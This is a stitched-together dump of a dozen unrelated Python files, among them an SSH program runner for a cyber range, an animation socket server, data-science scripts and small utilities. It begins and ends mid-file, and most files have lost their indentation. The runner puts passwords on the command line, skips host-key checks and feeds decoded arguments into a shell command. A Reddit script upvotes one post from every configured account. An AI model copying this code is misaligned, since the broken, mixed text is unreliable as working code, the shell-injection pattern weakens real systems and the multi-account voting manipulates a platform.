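    assert mem.get16(0) == 0x1234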
|
#!/usr/bin/python
import sys
import subprocess
import urllib
from limitedstringqueue import LimitedStringQueue
PROGRAM = sys.argv[1]
COMPILER = sys.argv[2]
#ARGS = sys.argv[3]
ARGS = urllib.unquote(sys.argv[3])
IMAGE_ADDR = sys.argv[4]
IMAGE_PASSWD = sys.argv[5]
LOG_FILE = sys.argv[6]
OS_TYPE=sys.argv[7]
EXECID = sys.argv[8]
# this program executes an external program on the cyber range
class RunProgram():
# run a shell command and append its output to the log file
def execute_command(self, command):
#p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=None)
q = LimitedStringQueue()
with open(LOG_FILE, "a") as myfile:
for line in p.stdout.readlines():
q.push(line)
myfile.write(line,)
myfile.write("\n") # separate previous outputs
myfile.write("exec-result: "+EXECID+" "+q.concaturlenc())
myfile.write("\n") # separate following outputs
# Waiting for a return code would not allow background execution, so we don't do it
# execute commands to run the program on cyber range
def runProgram(self):
program_compiler = ""
# get the appropriate compiler
if COMPILER == "python":
program_compiler = "python"
if COMPILER == "ruby":
program_compiler = "ruby"
if COMPILER == "powershell":
program_compiler = "powershell"
if COMPILER == "bash":
program_compiler = "bash"
# process args
if ARGS == "none":
program_args = ""
else:
program_args = ARGS
# execute program on virtual machine
defined_aws_version = ["amazon_linux", "amazon_linux2", "red_hat", "ubuntu_16", "ubuntu_18", "ubuntu_20"]
if OS_TYPE=="windows.7":
command = "sshpass -p {0} ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@{1} {2} \"{3}\" {4}".format(IMAGE_PASSWD, IMAGE_ADDR, program_compiler, PROGRAM, program_args)
elif OS_TYPE in defined_aws_version:
command = "sshpass -p {0} ssh -i TESTKEY.pem -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no ec2-user@{1} {2} {3} {4}".format(IMAGE_PASSWD, IMAGE_ADDR, program_compiler, PROGRAM, program_args)
else:
command = "sshpass -p {0} ssh -E /dev/null -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@{1} {2} '{3} {4}'".format(IMAGE_PASSWD, IMAGE_ADDR, program_compiler, PROGRAM, program_args)
self.execute_command(command)
print command
runProgram = RunProgram()
runProgram.runProgram()
|
import numpy as np
import json
from vis_utils.scene.components import ComponentBase
import socket
import threading
import time
import sys
from vis_utils import constants
STANDARD_DT=1.0/120
def write_to_json_file(filename, serializable, indent=4):
    with open(filename, 'w') as outfile:
        print("save to ", filename)
        # honour the indent parameter (it was previously ignored); the 'with' block closes the file
        outfile.write(json.dumps(serializable, indent=indent))
def to_unity_frame(skeleton, frame, animated_joints, scale, action, events, is_idle=True, success=True):
unity_frame = {"rotations": [], "rootTranslation": None, "action": action, "events": events, "isIdle": is_idle, "success": success}
for node_name in skeleton.nodes.keys():
if node_name in animated_joints:
node = skeleton.nodes[node_name]
if node_name == skeleton.root:
t = frame[:3] * scale
unity_frame["rootTranslation"] = {"x": -t[0], "y": t[1], "z": t[2]}
if node_name in skeleton.animated_joints: # use rotation from frame
# TODO fix: the animated_joints is ordered differently than the nodes list for the latest model
index = skeleton.animated_joints.index(node_name)
offset = index * 4 + 3
r = frame[offset:offset + 4]
unity_frame["rotations"].append({"x": -r[1], "y": r[2], "z": r[3], "w": -r[0]})
else: # use fixed joint rotation
r = node.rotation
unity_frame["rotations"].append(
{"x": -float(r[1]), "y": float(r[2]), "z": float(r[3]), "w": -float(r[0])})
return unity_frame
def parse_message(input_bytes):
    """Decode bytes into a UTF-8 string, treating 0x00 bytes as message delimiters."""
    n_bytes = len(input_bytes)
    start_offset = 0
    msg_str = ""
    # the original loop duplicated the start_offset check and never advanced past a
    # delimiter, so it hung on inputs containing more than one message
    while start_offset < n_bytes:
        end_offset = start_offset
        while end_offset < n_bytes and input_bytes[end_offset] != 0x00:
            end_offset += 1
        msg_str += bytes.decode(input_bytes[start_offset:end_offset], "utf-8")
        start_offset = end_offset + 1
    return msg_str
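# Illustrative round trip (assumption: messages are UTF-8 strings separated by
# single 0x00 bytes, as the loop above expects):
#   parse_message(b'hello\x00world\x00')  ->  'helloworld'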
def find_header_of_message(conn):
LEN = 0
data = b''
header_received = False
while not header_received:
len_msg = conn.recv(1)
data += len_msg
if len(data) == 4:
LEN = int.from_bytes(data, 'big')
# print("Length: " + str(LEN))
data = b''
header_received = True
while len(data) < LEN*2:
byte = conn.recv(1)
data += byte
return data
def parse_client_message(server, client_msg_str):
try:
if client_msg_str.startswith("Input:"):
idx = len("Input:")
input_key = client_msg_str[idx:idx + 1]
server.input_key = input_key
elif client_msg_str.startswith("Direction:"):
idx = len("Direction:")
#print("recieved", client_msg_str[idx:])
vec = json.loads(client_msg_str[idx:])
server.set_direction(np.array([vec["x"], vec["y"], vec["z"]]))
elif client_msg_str.startswith("Action:"):
idx = len("Action:")
action = json.loads(client_msg_str[idx:])
p = action["position"]
if action["keyframe"] != "" and action["joint"] != "":
position = np.array([p["x"], p["y"], p["z"]])
else:
position = None
server.schedule_action(action, position)
elif client_msg_str.startswith("SetPose:"):
idx = len("SetPose:")
print("setting pose", idx)
pose = json.loads(client_msg_str[idx:])
p = pose["position"]
q = pose["orientation"]
server.set_avatar_orientation(np.array([q["w"],q["x"], q["y"], q["z"]]))
server.set_avatar_position(np.array([p["x"], p["y"], p["z"]]))
if "forceWalkEndConstraints" in pose:
print("force constraints", pose["forceWalkEndConstraints"])
server.animation_src.planner.settings.force_walk_end_targets = pose["forceWalkEndConstraints"]
elif client_msg_str.startswith("ActionPath:"):
#print("received", client_msg_str)
idx = len("ActionPath:")
action_desc = json.loads(client_msg_str[idx:])
action_desc = convert_dicts_to_numpy(action_desc)
server.schedule_action_path(action_desc)
elif client_msg_str.startswith("ActionSequence:"):
print("received", client_msg_str)
idx = len("ActionSequence:")
action_sequence_desc = json.loads(client_msg_str[idx:])
_action_sequence_desc = []
for action_desc in action_sequence_desc:
action_desc = convert_dicts_to_numpy(action_desc)
_action_sequence_desc.append(action_desc)
server.schedule_action_sequence(_action_sequence_desc)
elif client_msg_str.startswith("DirectionSequence:"):
print("received", client_msg_str)
idx = len("DirectionSequence:")
dir_sequence_desc = json.loads(client_msg_str[idx:])
_dir_sequence_desc = []
for action_desc in dir_sequence_desc:
action_desc = convert_dicts_to_numpy(action_desc)
_dir_sequence_desc.append(action_desc)
server.schedule_direction_sequence(_dir_sequence_desc)
elif client_msg_str.startswith("SetScene:"):
print("received", client_msg_str)
idx = len("SetScene:")
scene_desc = json.loads(client_msg_str[idx:])
server.set_scene_from_desc(scene_desc)
print("finished building scene")
elif client_msg_str.startswith("Unpause"):
server.unpause_motion()
elif client_msg_str.startswith("PlayClip:"):
idx = len("PlayClip:")
action_desc = json.loads(client_msg_str[idx:])
clip_name = action_desc["clip_name"]
server.play_clip(clip_name)
elif client_msg_str.startswith("HandleCollision"):
server.handle_collision()
except Exception as e:
print("Exception:",e.args)
sys.exit(0)
def receive_client_message(server, conn):
if server.search_message_header:
input_bytes = find_header_of_message(conn)
client_msg_str = bytes.decode(input_bytes, "utf-8")
take = False
tmp = client_msg_str
client_msg_str = ""
# the header-framed payload is two bytes per character; keep every second byte
for char in tmp:
if take:
client_msg_str += char
take = False
else:
take = True
# print(client_msg_str)
else:
input_bytes = conn.recv(server.buffer_size)
client_msg_str = parse_message(input_bytes)
parse_client_message(server, client_msg_str)
def convert_dicts_to_numpy(action_desc):
for key in ["orientationVector", "lookAtTarget", "spineTarget","direction"]:
if key in action_desc:
v = action_desc[key]
action_desc[key] = np.array([v["x"], v["y"], v["z"]])
if "controlPoints" in action_desc:
control_points = []
for p in action_desc["controlPoints"]:
control_points.append([p["x"], p["y"], p["z"]])
action_desc["controlPoints"] = control_points
if "frameConstraints" in action_desc:
for c in action_desc["frameConstraints"]:
p = c["position"]
c["position"] = np.array([p["x"], p["y"], p["z"]])
q = c["orientation"]
c["orientation"] = np.array([q["w"], q["x"], q["y"], q["z"]])
if "offset" in c:
o = c["offset"]
c["offset"] = np.array([o["x"], o["y"], o["z"], 1])
if "vectorToParent" in c:
v = c["vectorToParent"]
c["vectorToParent"] = np.array([v["x"], v["y"], v["z"]])
if "toolEndPoint" in c:
o = c["toolEndPoint"]
c["toolEndPoint"] = np.array([o["x"], o["y"], o["z"]])
if "srcToolCos" in c:
for a in ["x","y"]:
if a in c["srcToolCos"]:
o = c["srcToolCos"][a]
c["srcToolCos"][a] = np.array([o["x"], o["y"], o["z"]])
if np.linalg.norm(c["srcToolCos"][a]) <= 0:
del c["srcToolCos"][a]
if "destToolCos" in c:
for a in ["x","y"]:
if a in c["destToolCos"]:
o = c["destToolCos"][a]
c["destToolCos"][a] = np.array([o["x"], o["y"], o["z"]])
if np.linalg.norm(c["destToolCos"][a]) <= 0:
del c["destToolCos"][a]
return action_desc
def on_new_client(server, conn, addr):
#client_msg = conn.recv(1024)
print("welcome",addr)
receive_client_message(server, conn)
skel_dict = server.get_skeleton_dict()
server_msg = json.dumps(skel_dict)
server_msg = server_msg.encode("utf-8")
server_msg += b'\x00'
#print("send", len(server_msg), server_msg)
conn.sendall(server_msg)
print("wait for answer")
client_msg = conn.recv(server.buffer_size)
print("received",client_msg)
while True:
try:
frame = server.get_frame()
if frame is not None:
#print("root", frame["rootTranslation"])
server_msg = json.dumps(frame)
server_msg = server_msg.encode("utf-8")
server_msg += b'\x00'
#print("send", len(server_msg))
conn.sendall(server_msg)
#print("sleep", server.get_frame_time())
time.sleep(server.get_frame_time())
receive_client_message(server, conn)
#print("received", client_msg)
except socket.error as error:
print("connection was closed", error.args)
server.set_direction(np.array([0,0,0]))
conn.close()
return
conn.close()
def server_thread(server, s):
print("server started")
while server.run:
c, addr = s.accept()
t = threading.Thread(target=on_new_client, name="addr", args=(server, c, addr))
t.start()
server.connections[addr] = t
print("server stopped")
s.close()
class TCPServer(object):
""" TCP server that sends and receives a single message
https://pymotw.com/2/socket/tcp.html
"""
BUFFER_SIZE = 4092 * 10000  # receive buffer size in bytes (~40 MB)
def __init__(self, port, buffer_size=BUFFER_SIZE):
self.address = ("", port)
self.buffer_size = buffer_size
self.connections = dict()
self.run = True
self.input_key = ""
def start(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(self.address)
except socket.error:
print("Binding failed")
return
s.listen(10)
t = threading.Thread(target=server_thread, name="c", args=(self, s))
t.start()
print("started server")
def close(self):
self.run = False
def get_frame(self):
return b"frame\n"
class AnimationTCPServerComponent(ComponentBase, TCPServer):
def __init__(self, port, scene_object, src_component):
print("create animation server", port)
ComponentBase.__init__(self, scene_object)
TCPServer.__init__(self, port)
self.src_component_key = src_component
self.animation_src = scene_object._components[src_component]
self.animation_src.animation_server = self
self.activate_emit = True
self.frame_buffer = None
self.skeleton = self.animation_src.get_skeleton()
# use joints that have children as a fallback for skeleton.animated_joints
self.animated_joints = [key for key in self.skeleton.nodes.keys() if len(self.skeleton.nodes[key].children) > 0]
self.scale = 1.0
self.search_message_header = False
self.activate_simulation = constants.activate_simulation
def start(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(self.address)
except socket.error:
print("Binding failed")
return
s.listen(10)
t = threading.Thread(target=server_thread, name="c", args=(self, s))
t.start()
def update(self, dt):
frame = self.animation_src.get_current_frame()
action = ""
events = list()
is_idle = True
success = True
if self.src_component_key == "morphablegraph_state_machine":
action = self.animation_src.current_node[1]
events = self.animation_src.get_events()
success = self.animation_src.has_success()
is_idle = len(self.animation_src.planner.state_queue) == 0 and not self.animation_src.planner.is_processing
self.frame_buffer = to_unity_frame(self.skeleton, frame, self.animated_joints, self.scale, action, events, is_idle, success)
self.frame_buffer["annotation"] = str(self.animation_src.get_current_annotation_label())
self.animation_src.handle_keyboard_input(self.input_key)
def get_frame(self):
return self.frame_buffer
def get_frame_time(self):
return self.animation_src.get_frame_time()
def get_skeleton_dict(self):
desc = self.skeleton.to_unity_format(animated_joints=self.animated_joints)
#print(self.animated_joints, desc["jointDescs"])
return desc
def set_direction(self, direction_vector):
if self.src_component_key == "morphablegraph_state_machine":
length = np.linalg.norm(direction_vector)
if length > 0:
self.animation_src.direction_vector = direction_vector/length
self.animation_src.target_projection_len = length
else:
self.animation_src.target_projection_len = 0
def schedule_action(self, action, position=None):
print("schedule action", action, position)
if self.src_component_key == "morphablegraph_state_machine":
if position is not None:
self.animation_src.set_action_constraint(action["name"], action["keyframe"], position, action["joint"])
self.animation_src.transition_to_action(action["name"])
def schedule_action_path(self, action, dt=STANDARD_DT, refresh=False):
#print("schedule action with path", action)
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.enqueue_states([action], dt, refresh)
#t = threading.Thread(target=self.animation_src.enqueue_states, name="c", args=(action, _control_points, 1.0/120, True))
#t.start()
def schedule_action_sequence(self, action_sequence, dt=STANDARD_DT, refresh=False):
print("schedule action sequence")
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.enqueue_states(action_sequence, dt, refresh)
def schedule_direction_sequence(self, direction_sequence, dt=STANDARD_DT, refresh=False):
print("schedule action sequence")
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.enqueue_states(direction_sequence, dt, refresh)
def play_clip(self, clip_name):
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.play_clip(clip_name)
def set_avatar_position(self, position):
print("set position", position)
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.set_global_position(position)
def set_avatar_orientation(self, orientation):
print("set orientation", orientation)
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.set_global_orientation(orientation)
def unpause_motion(self):
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.unpause()
def set_scene_from_desc(self, desc):
#self.scene_object.scene.object_builder.create_object("scene_desc", desc, self.scene_object.scene.visualize)
func_name = "create_objects"
func = self.scene_object.scene.object_builder.create_object
params = "scene_desc", desc, self.scene_object.scene.visualize
if self.activate_simulation:
self.scene_object.scene.schedule_func_call(func_name, func, params)
def handle_collision(self):
if self.src_component_key == "morphablegraph_state_machine":
self.animation_src.handle_collision()
|
# Create Subreddit network using networkx
import pandas as pd
import matplotlib.pyplot as plt
import networkx as nx
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
input_subreddits = ['ClimateSkeptics','Climate']
# Set minimum number of individual users and submissions required for a subreddit to be added to the network
min_users = 20
min_submissions = 1000
# Read in csv
cs_df = pd.read_csv('climateskeptics_SubredditNetwork_FULL.csv')
co_df = pd.read_csv('climate_SubredditNetwork_FULL.csv')
cs_df = cs_df[cs_df['Distinct_Users'] > min_users]
cs_df = cs_df[cs_df['Total_Submissions'] > min_submissions]
co_df = co_df[co_df['Distinct_Users'] > min_users]
co_df = co_df[co_df['Total_Submissions'] > min_submissions]
# Create Full DataFrame with All Data
# Need to split up skeptics and activists
cs_df['CS_Submissions'] = cs_df['Total_Submissions']
cs_df['CS_Users'] = cs_df['Distinct_Users']
cs_df['CO_Submissions'] = 0
cs_df['CO_Users'] = 0
co_df['CS_Submissions'] = 0
co_df['CS_Users'] = 0
co_df['CO_Submissions'] = co_df['Total_Submissions']
co_df['CO_Users'] = co_df['Distinct_Users']
# Combine dataframes and merge, grouping by subreddits and summing the other columns
full_df = pd.concat([cs_df,co_df],ignore_index=True)
full_df = full_df.groupby(['Subreddits']).sum().reset_index()
full_df = full_df.sort_values(by=['Distinct_Users'],ascending=False)
full_df.reset_index(drop=True, inplace=True)
cs_nodes = list(cs_df['Subreddits'])
co_nodes = list(co_df['Subreddits'])
# Create Graph
G = nx.Graph()
G.add_node('ClimateSkeptics', perc_cs = 100, totalsubs=60000) # Add home node
G.add_node('Climate',perc_cs = 0, totalsubs=60000)
for n in cs_nodes:
idx = full_df.loc[full_df['Subreddits'] == n].index[0]
total_subs = full_df['Total_Submissions'][idx]
perc_cs_users = (full_df['CS_Users'][idx]/full_df['Distinct_Users'][idx])*100
G.add_node(n,perc_cs = float(perc_cs_users), totalsubs = total_subs)
G.add_edge('ClimateSkeptics',n,weight=full_df['CS_Users'][idx])
for n in co_nodes:
idx = full_df.loc[full_df['Subreddits'] == n].index[0]
total_subs = full_df['Total_Submissions'][idx]
perc_cs_users = (full_df['CS_Users'][idx]/full_df['Distinct_Users'][idx])*100
G.add_node(n,perc_cs = float(perc_cs_users), totalsubs = total_subs)
G.add_edge('Climate',n,weight=full_df['CO_Users'][idx])
# Create Network Plot
nodes = G.nodes()
colors = [G.nodes[n]['perc_cs'] for n in nodes]  # G.node was removed in networkx 2.4; G.nodes works from 2.0 on
sizes = [(G.nodes[n]['totalsubs'] / 50) for n in nodes]
fig = plt.figure()
pos = nx.spring_layout(G)
ec = nx.draw_networkx_edges(G, pos, alpha=0.2)
# labels are drawn separately below; draw_networkx_nodes has no with_labels option
nc = nx.draw_networkx_nodes(G, pos, nodelist=nodes, node_color=colors, node_size=sizes, cmap=plt.cm.RdYlGn_r, alpha=0.95)
nx.draw_networkx_labels(G, pos=pos, font_size=10)
cbar = plt.colorbar(nc)
cbar.set_label("% Users from /r/climateskeptics", rotation = 90, fontsize=16)
plt.axis('off')
fig.tight_layout()
plt.show()
# Export to GEPHI Format
#nx.write_gexf(G, "test.gexf")
|
#!C:\python27
import time
# decorator that reports a function's wall-clock execution time
def performance(f):
def exec_time(*args,**kw):
time_s=time.time()
res=f(*args,**kw)
time_e=time.time()
print 'call %s in %fs'%(f.__name__,(time_e-time_s))
return res
return exec_time
@performance
def factorial(n):
return reduce(lambda x,y:x*y,range(1,n+1))
print factorial(20)
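# Variant sketch (assumption: same Python 2 environment as the shebang above):
# functools.wraps preserves the wrapped function's __name__ and docstring, which
# the plain closure above does not (factorial.__name__ reports 'exec_time').
#
#   import functools
#   def performance(f):
#       @functools.wraps(f)
#       def exec_time(*args, **kw):
#           ...
#       return exec_time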
|
import json
def render_stack(error):
return '\n '.join(error.get('stack'))
def render_error(component_name, data):
return """
<div style="background-color: #ff5a5f; color: #fff; padding: 12px;">
<p style="margin: 0">
<strong>Warning!</strong>
The <code>{}</code> component failed to render with Hypernova.
Error stack:
</p>
<pre style="padding: 0 20px; white-space: pre-wrap;">{}</pre>
</div>
{}
""".format(
component_name, render_stack(data.get('error')), data.get('html')
)
def render_error_or_html(data):
    if data.get('error'):
        # render_error() needs a component name; none is available in this scope, so pass a placeholder
        return render_error('unknown component', data)
    return data.get('html')
class DevModePlugin(object):
"""Plugin to enable additional logging from Hypernova"""
def __init__(self, logger):
self.logger = logger
def after_response(self, current_response, original_response):
updated = current_response.copy()
for name, data in updated.iteritems():
if data.get('error'):
data['html'] = render_error(name, data)
return updated
def on_error(self, error, jobs):
self.logger.debug(render_stack(error))
|
from tkinter import *
from tkinter.filedialog import asksaveasfilename, askopenfilename
import subprocess
import sys
Window = Tk()
Window.title("Pycoder")
font = ("Comic Sans MS", 16)
fontcolor = "black"
fontback = "gray"
try:
FilePath = sys.argv[1]
except:
FilePath = ""
def prompt(message):
    messagewindow = Toplevel()
    messagewindow.geometry("250x50")
    Label(messagewindow, text = message).pack()
def save():
    # fall back to Save As when the file has no path yet
    if FilePath == "":
        saveas()
        return
    with open(FilePath, "w") as file:
        code = editor.get("1.0", END)
        file.write(code)
def saveas():
global FilePath
FilePath = asksaveasfilename(filetypes = [("Python File", "*.py")])
with open(FilePath, "w") as file:
code = editor.get("1.0", END)
file.write(code)
def openfile():
global FilePath
FilePath = askopenfilename(filetypes = (("Python File", "*.py"),))
with open(FilePath, "r") as file:
code = file.read()
editor.delete("1.0", END)
editor.insert("1.0", code)
def runcode():
if FilePath == "":
prompt("file not saved")
return
com = f'python {FilePath}'
process = subprocess.Popen(com, stdout= subprocess.PIPE, stderr= subprocess.PIPE, shell=True)
output, error = process.communicate()
ConsoleOut.insert("1.0", output)
ConsoleOut.insert("1.0", error)
MainBar = Menu(Window)
# file menu
FileBar = Menu(MainBar, tearoff = 0)
FileBar.add_command(label = "Open", command = openfile)
FileBar.add_command(label = "Save", command = save)
FileBar.add_command(label = "Save As", command = saveas)
FileBar.add_command(label = "Exit", command = exit)
MainBar.add_cascade(label ="File", menu = FileBar)
# run menu
runBar = Menu(MainBar, tearoff = 0)
runBar.add_command(label = "Run", command = runcode)
MainBar.add_cascade(label ="Run", menu = runBar)
Window.config(menu=MainBar)
editor = Text(height = 10,bg=fontback, fg = fontcolor)
editor.grid(row=0, column = 0)
editor.configure(font = font)
ConsoleOut = Text(height = 7,bg=fontback, fg = fontcolor)
ConsoleOut.grid(row=1, column =0)
ConsoleOut.configure(font = font)
Window.mainloop()
|
from flask import Flask
# Load the app ID and app secret from the instance config file
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile('secret.cfg')
|
import tensorflow.compat.v1 as tf
from model import CycleGAN
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string('checkpoint_dir', 'checkpointsce/20211125-1624', 'checkpoints directory path')
tf.flags.DEFINE_string('XtoY_model', 'cbct2sct.pb', 'XtoY model name, default: cbct2sct.pb')
tf.flags.DEFINE_string('YtoX_model', 'sct2cbct.pb', 'YtoX model name, default: sct2cbct.pb')
tf.flags.DEFINE_integer('width', 288, 'width, default: 288')
tf.flags.DEFINE_integer('height', 320, 'height, default: 320')
tf.flags.DEFINE_integer('ngf', 32, 'number of gen filters in first conv layer, default: 32')
tf.flags.DEFINE_string('norm', 'instance', '[instance, batch] use instance norm or batch norm, default: instance')
def export_graph(model_name, XtoY=True):
graph = tf.Graph()
with graph.as_default():
cycle_gan = CycleGAN(ngf=FLAGS.ngf, norm=FLAGS.norm, height=FLAGS.height, width=FLAGS.width)
input_image = tf.placeholder(tf.float32, shape=[FLAGS.height,FLAGS.width, 1], name='input_image')
cycle_gan.model()
if XtoY:
output_image = cycle_gan.G.sample(tf.expand_dims(input_image, 0))
else:
output_image = cycle_gan.F.sample(tf.expand_dims(input_image, 0))
output_image = tf.identity(output_image, name='output_image')
restore_saver = tf.train.Saver()
export_saver = tf.train.Saver()
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
latest_ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)
restore_saver.restore(sess, latest_ckpt)
output_graph_def = tf.graph_util.convert_variables_to_constants(
sess, graph.as_graph_def(), [output_image.op.name])
tf.train.write_graph(output_graph_def, 'pretrained', model_name, as_text=False)
def main(unused_argv):
    print('Export XtoY model...')
    export_graph(FLAGS.XtoY_model, XtoY=True)
    # also export the reverse mapping; the YtoX_model flag was otherwise unused
    print('Export YtoX model...')
    export_graph(FLAGS.YtoX_model, XtoY=False)
if __name__ == '__main__':
tf.app.run()
|
from tests.test_yuos_client import VALID_PROPOSAL_DATA
from yuos_query.utils import (
deserialise_proposals_from_json,
serialise_proposals_to_json,
)
def test_converting_proposals_to_json_and_back():
proposal_json = serialise_proposals_to_json(VALID_PROPOSAL_DATA)
proposals = deserialise_proposals_from_json(proposal_json)
assert proposals["471120"].id == VALID_PROPOSAL_DATA["471120"].id
assert proposals["471120"].title == VALID_PROPOSAL_DATA["471120"].title
assert proposals["471120"].proposer == VALID_PROPOSAL_DATA["471120"].proposer
assert proposals["471120"].users == VALID_PROPOSAL_DATA["471120"].users
assert proposals["471120"].db_id == VALID_PROPOSAL_DATA["471120"].db_id
assert (
proposals["471120"].samples[0].name
== VALID_PROPOSAL_DATA["471120"].samples[0].name
)
assert (
proposals["471120"].samples[0].formula
== VALID_PROPOSAL_DATA["471120"].samples[0].formula
)
assert (
proposals["471120"].samples[0].number
== VALID_PROPOSAL_DATA["471120"].samples[0].number
)
assert (
proposals["471120"].samples[0].mass_or_volume
== VALID_PROPOSAL_DATA["471120"].samples[0].mass_or_volume
)
assert (
proposals["471120"].samples[0].density
== VALID_PROPOSAL_DATA["471120"].samples[0].density
)
|
from sys import argv
from os import getenv
from configparser import ConfigParser
from logging import getLogger, FileHandler, Formatter, StreamHandler
from praw.models import Submission
from praw import Reddit
LOG_LEVEL = getenv("LOG_LEVEL", "INFO")
log_formatter = Formatter(
"%(asctime)s, %(levelname)s [%(filename)s:%(lineno)d] %(funcName)s(): %(message)s",
datefmt="%d/%m/%Y %H:%M:%S",
)
logger = getLogger(__name__)
logger.setLevel(LOG_LEVEL)
# Add file handler to logger
file = FileHandler(filename="logs/access.log", mode="a")
file.setFormatter(log_formatter)
logger.addHandler(file)
# Add stream handler to logger
stream = StreamHandler()
stream.setFormatter(log_formatter)
logger.addHandler(stream)
def main():
args = argv[1:]
if len(args) > 1:
    print("Too many arguments. Exactly 1 positional argument (the submission URL) is expected")
exit(-1)
elif len(args) < 1:
print("No URL argument provided")
exit(-2)
else:
try:
config = ConfigParser()
config.read("praw.ini")
for section in config.sections():
logger.info(f"Will login as {section}")
bot = Reddit(
site_name=section,
config_interpolation="basic",
)
logger.info(f"Logged in as {bot.user.me()}")
submission: Submission = bot.submission(url=args[0])
submission.upvote()
logger.info(f"{bot.user.me()} voted up {submission.url}")
except Exception as e:
logger.error(f"{e}")
if __name__ == "__main__":
main()
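# Expected praw.ini layout (illustrative credentials; the script iterates over
# every section and votes once per account):
#
#   [bot1]
#   client_id=...
#   client_secret=...
#   username=...
#   password=...
#   user_agent=upvote script by u/example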
|
import bpy
import sys
def print_usage():
print("usage: export.py target_file")
argv = sys.argv[1:]
if '--' not in argv:
print_usage()
exit(1)
argv = argv[argv.index("--") + 1:]
if len(argv) != 1:
print_usage()
exit(1)
target_file = argv[0]
bpy.ops.export_scene.gltf(filepath=target_file, export_apply=True, export_colors=False)
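# Typical invocation (arguments after '--' are passed through to this script):
#   blender --background scene.blend --python export.py -- /tmp/scene.gltf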
|
##
# Torsional Drillstring Model
# Parameters for Well B
#
# @Authors: Ulf Jakob Aarsnes, Roman Shor, Jonathan McIntyre
#
# Copyright 2021 Open Drilling Project
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial
# portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
#
import math
import numpy as np
from scipy.interpolate import interp1d
class parameters_WellB:
def __init__(self, MD, mu, fRat, oThres):
# Physical parameters
LcV = np.array([48.700, 114.800, 56.700, 38.880])
ODV = np.array([0.150473, 0.187322, 0.209550, 0.247280])
IDV = np.array([0.096207, 0.098912, 0.071438, 0.123391])
# Averaged polar moment of inertia and cross sectional area for BHA
self.Ac = np.sum(LcV * math.pi * ((ODV / 2) ** 2 - (IDV / 2) ** 2)) / np.sum(LcV)
# polar moment of inertia J = pi * (OD^4 - ID^4) / 32; the original applied the factor pi twice
self.Jc = np.sum(LcV * math.pi * (ODV ** 4 - IDV ** 4) / 32) / np.sum(LcV)
self.Cro = np.sum(LcV * ODV / 2) / np.sum(LcV)
# Pipe
self.Pro = 0.146529 / 2 # [m] Drill string outer radius
self.Pri = 0.123024 / 2 # [m] Drill string inner radius
self.Jp = math.pi / 2 * (self.Pro ** 4 - self.Pri ** 4) # [m^4] Drill string polar moment of inertia
self.Ap = math.pi * (self.Pro ** 2 - self.Pri ** 2) # [m^2] Drill string cross sectional area
self.Gp = 61e9 # [Pa] Pipe shear modulus
self.Gc = 67e9 # [Pa] Collar shear modulus
self.rho = 7850 # [kg/m3] Density
self.I_TD = 2900 # [kgm^2] Actual top drive measured mass moment of inertia
self.kt = 50 * 1 # [-] Torsional damping
# Computed quantities
self.c_t = math.sqrt(self.Gp / self.rho)
# Length parameters
self.Lc = 230 # [m] Drill collar length
self.Lp = MD - self.Lc # [m] Drill pipe length
# Numerics params
Pt = 1000 # Number of cells in discretization
self.Pp = round(Pt * self.Lp / (self.Lp + self.Lc)) # Pipe cells
self.Pc = Pt - self.Pp # Collar cells
self.xp = np.linspace(0, self.Lp, self.Pp)
self.xc = self.Lp + np.linspace(0, self.Lc, self.Pc)
# Inclination vectors
MD_prof = np.array([0, 500, 1600, 4000])
inc_prof = np.array([0, 0, 60, 60])
self.PthetaVec = interp1d(MD_prof, inc_prof)(self.xp) * math.pi / 180
self.CthetaVec = interp1d(MD_prof, inc_prof)(self.xc) * math.pi / 180
# Coulomb friction params
self.f_thres = mu
self.f_tRat = fRat
self.o_thres = oThres
g = 9.81 # Acceleration of gravity
self.P_thresProfile = g * np.sin(self.PthetaVec) * self.rho * self.Ap * self.Pro * self.f_thres # Torque per meter [Nm/m]
self.C_thresProfile = g * np.sin(self.CthetaVec) * self.rho * self.Ac * self.Cro * self.f_thres # Torque per meter [Nm/m]
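# Usage sketch (illustrative argument values; MD is measured depth in metres,
# mu the Coulomb friction coefficient, fRat and oThres the friction-ratio and
# angular-velocity thresholds stored above):
#
#   params = parameters_WellB(MD=2500, mu=0.25, fRat=0.7, oThres=0.02)
#   print(params.Lp, params.Pp, params.Pc)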
|
import csv, os
from enum import Enum
from models.Person import *
from Utilities import Logger
def get_acs_person_data(filepath, year):
# set up personal logger
logger = Logger()
current_path = os.getcwd()
logger.define_issue_log(os.path.join(current_path, 'files/issues.log'))
dictionary_of_people = dict()
